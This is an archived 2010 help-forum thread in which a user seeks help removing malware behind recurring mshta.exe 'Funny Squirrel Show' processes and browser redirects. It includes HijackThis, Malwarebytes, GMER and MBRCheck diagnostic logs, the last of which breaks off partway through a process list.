1. You are viewing our forum as a guest. For full access please Register. WindowsBBS.com is completely free, paid for by advertisers and donations.

Solved mshta.exe "Funny Squirrel Show"

Discussion in 'Malware and Virus Removal Archive' started by Cosmic Jester, 2010/12/04.

Page 1 of 3
  1. 2010/12/04
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    [Resolved] mshta.exe "Funny Squirrel Show "

    Hi guys,
    This is my first post and I look so forward to having this issue resolved, I will try to explain with as most detail as possible.

    Last night 4/12/2010 (Melbourne, Victoria Time), I was plagued with Malware ever since I had my PC return from a repair shop, the said Malware did the following things:
    - An Error Report Message (Host Controller for Win32 has encountered a problem) is appearing most likely due to Malware. This would happen after a period of time.

    - My PC 'hangs' on to the Desktop during startup, but won't go any further. However there is a chance it will startup normally. (Although I haven't encountered it since yesterday.

    - I get redirected when I click on a link in my Google search. (Like above, I haven't encountered it since last night)

    I scanned my PC with MalwareBytes and deleted a whole bunch of infections, did a Process Explorer and MaCfee stinger scan during the night while I slept, upon waking up in the morning, I noticed there were several processes named; mshta.exe with the http:// comment (by mousing over the executable); "Funny Squirrel Show" (like as if it was from a website).

    ||||My Hijack This Log:||||

    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 11:10:03 AM, on 5/12/2010
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    C:\WINDOWS\system32\PnkBstrA.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    C:\Program Files\Logitech\SetPointP\SetPoint.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Microsoft LifeChat\LifeChat.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\RocketDock\RocketDock.exe
    C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\System32\svchost.exe
    C:\windows-kb890830-v3.13.exe
    c:\090446d3ad7637842acf\mrtstub.exe
    C:\WINDOWS\system32\MRT.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Mozilla Firefox\plugin-container.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\system32\NOTEPAD.EXE
    C:\Program Files\HiJackThis\HijackThis.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R3 - URLSearchHook: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
    O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe "
    O4 - HKLM\..\Run: [WindowsLivePhone] C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe /AutoRun
    O4 - HKLM\..\Run: [Malwarebytes' Anti-Malware] "C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" /starttray
    O4 - HKLM\..\Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe "
    O4 - HKLM\..\Run: [LifeChat] "C:\Program Files\Microsoft LifeChat\LifeChat.exe "
    O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    O4 - HKLM\..\Run: [nwiz] C:\Program Files\NVIDIA Corporation\nView\nwiz.exe /installquiet
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe "
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe "
    O4 - HKCU\..\Run: [WindowsLivePhone] "C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe" /AutoRun
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
    O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
    O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
    O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
    O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
    O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
    O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
    O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
    O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe

    --
    End of file - 9122 bytes

    If anyone can please help me get rid of this mshta.exe, and possibly confirm whether or not my previous problems (the ones I stated in the list above) are still likely to occur due to them not being deleted.

    Thanks in advance, I look forward to having this problem resolved,

    - Jester
     
    Last edited: 2010/12/04
    Cosmic Jester,
    #1
  2. 2010/12/04
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    crunchie,
    #2


  3. to hide this advert.

  4. 2010/12/04
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    Sure thing.
    Should I make each log as a separate reply?
    eg. Malware Bytes Log on Post #4
    GMER Log on Post #5
    etc. ?
     
    Last edited: 2010/12/04
    Cosmic Jester,
    #3
  5. 2010/12/04
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    Fit as many into one post as you can please.
     
    crunchie,
    #4
  6. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    Sorry!

    Sorry it took so long to make a reply, GMER took 5-6 hours to do a full scan of my PC.

    The Logs are in this order (to prevent confusion):
    MalwareBytes
    GMER
    MBR Check
    DDS (The one that is meant to be attached)
    DDS (The one that is NOT meant to be attached)


    Malwarebytes' Anti-Malware 1.50
    www.malwarebytes.org

    Database version: 5245

    Windows 5.1.2600 Service Pack 2
    Internet Explorer 6.0.2900.2180

    5/12/2010 2:54:58 PM
    mbam-log-2010-12-05 (14-54-58).txt

    Scan type: Quick scan
    Objects scanned: 141518
    Time elapsed: 4 minute(s), 12 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 0
    Registry Values Infected: 0
    Registry Data Items Infected: 0
    Folders Infected: 0
    Files Infected: 0

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    (No malicious items detected)

    Registry Values Infected:
    (No malicious items detected)

    Registry Data Items Infected:
    (No malicious items detected)

    Folders Infected:
    (No malicious items detected)

    Files Infected:
    (No malicious items detected)

    GMER 1.0.15.15530 - http://www.gmer.net
    Rootkit scan 2010-12-05 21:42:44
    Windows 5.1.2600 Service Pack 2 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-f ST3250310AS rev.3.AAA
    Running: pxwbbt81.exe; Driver: C:\DOCUME~1\Marshall\LOCALS~1\Temp\awliqfob.sys


    ---- Kernel code sections - GMER 1.0.15 ----

    .text C:\WINDOWS\system32\DRIVERS\nv4_mini.sys section is writeable [0xB72E93A0, 0x5CC259, 0xE8000020]
    ? C:\WINDOWS\system32\Drivers\PROCEXP141.SYS The system cannot find the file specified. !

    ---- Registry - GMER 1.0.15 ----

    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0x15 0xE6 0x2A 0xA6 ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 F:\Program Files\DAEMON Tools Lite\
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x0C 0x78 0x24 0xBC ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x7B 0xE7 0xD0 0xAE ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0x15 0xE6 0x2A 0xA6 ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 F:\Program Files\DAEMON Tools Lite\
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x0C 0x78 0x24 0xBC ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x7B 0xE7 0xD0 0xAE ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0x15 0xE6 0x2A 0xA6 ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 F:\Program Files\DAEMON Tools Lite\
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x0C 0x78 0x24 0xBC ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x7B 0xE7 0xD0 0xAE ...

    ---- EOF - GMER 1.0.15 ----

    MBRCheck, version 1.2.3
    (c) 2010, AD

    Command-line:
    Windows Version: Windows XP Professional
    Windows Information: Service Pack 2 (build 2600)
    Logical Drives Mask: 0x0000001c

    Kernel Drivers (total 127):
    0x804D7000 \WINDOWS\system32\ntkrnlpa.exe
    0x806E2000 \WINDOWS\system32\hal.dll
    0xB85A8000 \WINDOWS\system32\KDCOM.DLL
    0xB84B8000 \WINDOWS\system32\BOOTVID.dll
    0xB7F79000 ACPI.sys
    0xB85AA000 \WINDOWS\system32\DRIVERS\WMILIB.SYS
    0xB7F68000 pci.sys
    0xB80A8000 isapnp.sys
    0xB80B8000 ohci1394.sys
    0xB80C8000 \WINDOWS\system32\DRIVERS\1394BUS.SYS
    0xB7E5D000 \WINDOWS\System32\Drivers\SCSIPORT.SYS
    0xB8670000 pciide.sys
    0xB8328000 \WINDOWS\system32\DRIVERS\PCIIDEX.SYS
    0xB80D8000 MountMgr.sys
    0xB7E3E000 ftdisk.sys
    0xB85AC000 dmload.sys
    0xB7E18000 dmio.sys
    0xB8330000 PartMgr.sys
    0xB80E8000 VolSnap.sys
    0xB7E00000 atapi.sys
    0xB80F8000 disk.sys
    0xB8108000 \WINDOWS\system32\DRIVERS\CLASSPNP.SYS
    0xB7DE1000 fltMgr.sys
    0xB7DCF000 sr.sys
    0xB7DB8000 KSecDD.sys
    0xB7D2B000 Ntfs.sys
    0xB7CFE000 NDIS.sys
    0xB7CE3000 Mup.sys
    0xB81A8000 \SystemRoot\system32\DRIVERS\intelppm.sys
    0xB8470000 \SystemRoot\system32\DRIVERS\usbohci.sys
    0xB7C62000 \SystemRoot\system32\DRIVERS\USBPORT.SYS
    0xB8478000 \SystemRoot\system32\DRIVERS\usbehci.sys
    0xB81B8000 \SystemRoot\system32\DRIVERS\cdrom.sys
    0xB81C8000 \SystemRoot\system32\DRIVERS\redbook.sys
    0xB7C3F000 \SystemRoot\system32\DRIVERS\ks.sys
    0xB8480000 \SystemRoot\system32\DRIVERS\GEARAspiWDM.sys
    0xB7C17000 \SystemRoot\system32\DRIVERS\HDAudBus.sys
    0xB8488000 \SystemRoot\system32\DRIVERS\usbuhci.sys
    0xB81D8000 \SystemRoot\system32\DRIVERS\nic1394.sys
    0xB72E9000 \SystemRoot\system32\DRIVERS\nv4_mini.sys
    0xB72D5000 \SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
    0xB81E8000 \SystemRoot\system32\DRIVERS\imapi.sys
    0xB81F8000 \SystemRoot\system32\DRIVERS\nvnetbus.sys
    0xB71FC000 \SystemRoot\system32\DRIVERS\NVNRM.SYS
    0xB7CB7000 \SystemRoot\system32\DRIVERS\wmiacpi.sys
    0xB877B000 \SystemRoot\system32\DRIVERS\audstub.sys
    0xB8208000 \SystemRoot\system32\DRIVERS\rasl2tp.sys
    0xB7CB3000 \SystemRoot\system32\DRIVERS\ndistapi.sys
    0xB71E5000 \SystemRoot\system32\DRIVERS\ndiswan.sys
    0xB8218000 \SystemRoot\system32\DRIVERS\raspppoe.sys
    0xB8228000 \SystemRoot\system32\DRIVERS\raspptp.sys
    0xB8490000 \SystemRoot\system32\DRIVERS\TDI.SYS
    0xB71D4000 \SystemRoot\system32\DRIVERS\psched.sys
    0xB8238000 \SystemRoot\system32\DRIVERS\msgpc.sys
    0xB8498000 \SystemRoot\system32\DRIVERS\ptilink.sys
    0xB84A0000 \SystemRoot\system32\DRIVERS\raspti.sys
    0xB71A3000 \SystemRoot\system32\DRIVERS\rdpdr.sys
    0xB8248000 \SystemRoot\system32\DRIVERS\termdd.sys
    0xB84A8000 \SystemRoot\system32\DRIVERS\kbdclass.sys
    0xB84B0000 \SystemRoot\system32\DRIVERS\mouclass.sys
    0xB85EA000 \SystemRoot\system32\DRIVERS\swenum.sys
    0xB7147000 \SystemRoot\system32\DRIVERS\update.sys
    0xB8540000 \SystemRoot\system32\DRIVERS\mssmbios.sys
    0xB8258000 \SystemRoot\system32\DRIVERS\NVENETFD.sys
    0xB8268000 \SystemRoot\System32\Drivers\NDProxy.SYS
    0xB8278000 \SystemRoot\system32\DRIVERS\usbhub.sys
    0xB85EC000 \SystemRoot\system32\DRIVERS\USBD.SYS
    0xB48BB000 \SystemRoot\system32\drivers\RtkHDAud.sys
    0xB4897000 \SystemRoot\system32\drivers\portcls.sys
    0xB82D8000 \SystemRoot\system32\drivers\drmk.sys
    0xB4880000 \SystemRoot\system32\drivers\nvhda32.sys
    0xB8604000 \SystemRoot\System32\Drivers\Fs_Rec.SYS
    0xB87F2000 \SystemRoot\System32\Drivers\Null.SYS
    0xB8606000 \SystemRoot\System32\Drivers\Beep.SYS
    0xB8390000 \SystemRoot\system32\DRIVERS\HIDPARSE.SYS
    0xB8398000 \SystemRoot\System32\drivers\vga.sys
    0xB8608000 \SystemRoot\System32\Drivers\mnmdd.SYS
    0xB860A000 \SystemRoot\System32\DRIVERS\RDPCDD.sys
    0xB83A0000 \SystemRoot\System32\Drivers\Msfs.SYS
    0xB83A8000 \SystemRoot\System32\Drivers\Npfs.SYS
    0xB717F000 \SystemRoot\system32\DRIVERS\rasacd.sys
    0xB4825000 \SystemRoot\system32\DRIVERS\ipsec.sys
    0xB47CD000 \SystemRoot\system32\DRIVERS\tcpip.sys
    0xB477D000 \SystemRoot\system32\DRIVERS\netbt.sys
    0xB475C000 \SystemRoot\system32\DRIVERS\ipnat.sys
    0xB7097000 \SystemRoot\System32\drivers\ws2ifsl.sys
    0xB473A000 \SystemRoot\System32\drivers\afd.sys
    0xB82F8000 \SystemRoot\system32\DRIVERS\wanarp.sys
    0xB8308000 \SystemRoot\system32\DRIVERS\netbios.sys
    0xB470E000 \SystemRoot\system32\DRIVERS\rdbss.sys
    0xB8318000 \SystemRoot\system32\DRIVERS\arp1394.sys
    0xB469F000 \SystemRoot\system32\DRIVERS\mrxsmb.sys
    0xB8138000 \SystemRoot\System32\Drivers\Fips.SYS
    0xB8158000 \SystemRoot\System32\Drivers\Cdfs.SYS
    0xB83B8000 \SystemRoot\system32\DRIVERS\usbccgp.sys
    0xB83C0000 \SystemRoot\System32\Drivers\LUsbFilt.Sys
    0xB8168000 \SystemRoot\System32\Drivers\WDFLDR.SYS
    0xB4584000 \SystemRoot\system32\DRIVERS\Wdf01000.sys
    0xB8568000 \SystemRoot\system32\DRIVERS\hidusb.sys
    0xB8178000 \SystemRoot\system32\DRIVERS\HIDCLASS.SYS
    0xB83C8000 \SystemRoot\system32\DRIVERS\LHidFilt.Sys
    0xB8570000 \SystemRoot\system32\DRIVERS\mouhid.sys
    0xB83D0000 \SystemRoot\system32\DRIVERS\LMouFilt.Sys
    0xB8574000 \SystemRoot\system32\DRIVERS\kbdhid.sys
    0xB8188000 \SystemRoot\system32\drivers\usbaudio.sys
    0xB4544000 \SystemRoot\System32\Drivers\dump_atapi.sys
    0xB8618000 \SystemRoot\System32\Drivers\dump_WMILIB.SYS
    0xBF800000 \SystemRoot\System32\win32k.sys
    0xB4868000 \SystemRoot\System32\drivers\Dxapi.sys
    0xB83E0000 \SystemRoot\System32\watchdog.sys
    0xBD000000 \SystemRoot\System32\drivers\dxg.sys
    0xB86D3000 \SystemRoot\System32\drivers\dxgthk.sys
    0xBD012000 \SystemRoot\System32\nv4_disp.dll
    0xBFFA0000 \SystemRoot\System32\ATMFD.DLL
    0xB39CE000 \??\C:\WINDOWS\system32\drivers\mbam.sys
    0xB38CA000 \SystemRoot\system32\DRIVERS\ndisuio.sys
    0xB35B1000 \SystemRoot\system32\DRIVERS\mrxdav.sys
    0xB86C9000 \SystemRoot\System32\Drivers\LBeepKE.sys
    0xB3524000 \SystemRoot\system32\drivers\wdmaud.sys
    0xB3926000 \SystemRoot\system32\drivers\sysaudio.sys
    0xB33E0000 \SystemRoot\system32\DRIVERS\srv.sys
    0xB2D57000 \SystemRoot\System32\Drivers\HTTP.sys
    0xB2C9F000 \SystemRoot\system32\DRIVERS\ipfltdrv.sys
    0xB8448000 \??\C:\WINDOWS\system32\Drivers\PROCEXP141.SYS
    0xB29F5000 \??\C:\DOCUME~1\Marshall\LOCALS~1\Temp\awliqfob.sys
    0xB288B000 \SystemRoot\system32\drivers\kmixer.sys
    0x7C900000 \WINDOWS\system32\ntdll.dll

    Processes (total 52):
    0 System Idle Process
    4 System
    636 C:\WINDOWS\system32\smss.exe
    684 csrss.exe
    708 C:\WINDOWS\system32\winlogon.exe
    756 C:\WINDOWS\system32\services.exe
    768 C:\WINDOWS\system32\lsass.exe
    932 C:\WINDOWS\system32\nvsvc32.exe
    992 C:\WINDOWS\system32\svchost.exe
    1040 svchost.exe
    1080 C:\WINDOWS\system32\svchost.exe
    1164 svchost.exe
    1236 svchost.exe
    1308 C:\WINDOWS\system32\svchost.exe
    1380 C:\WINDOWS\system32\spoolsv.exe
    1480 svchost.exe
    1516 C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    1532 C:\Program Files\Bonjour\mDNSResponder.exe
    1668 C:\Program Files\Java\jre6\bin\jqs.exe
    1700 C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    1752 C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    1928 C:\PROGRA~1\McAfee\SITEAD~1\McSACore.exe
    1964 C:\WINDOWS\system32\PnkBstrA.exe
    2032 C:\WINDOWS\explorer.exe
    500 C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    508 C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    516 C:\Program Files\Logitech\SetPointP\SetPoint.exe
    544 C:\Program Files\iTunes\iTunesHelper.exe
